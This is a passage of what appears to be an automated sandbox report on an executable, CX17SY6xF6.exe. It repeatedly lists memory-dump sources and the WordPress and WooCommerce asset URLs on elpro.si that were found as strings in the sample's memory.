CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce-multilingual/res/js/cart_widget.min.js?ver=5.2.0
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce-multilingual/res/js/front-scripts.min.js?ver=5.2.
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=7.9.0
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css?ver=7.9.0
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=7.9.0
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=7.9.0
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ve
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-style
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-vendo
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/wp-smush-pro/app/assets/js/smush-lazy-load.min.js?ver=3.14.1
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/yith-woocommerce-wishlist/assets/css/font-awesome.css?ver=4.7
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/yith-woocommerce-wishlist/assets/css/jquery.selectBox.css?ver
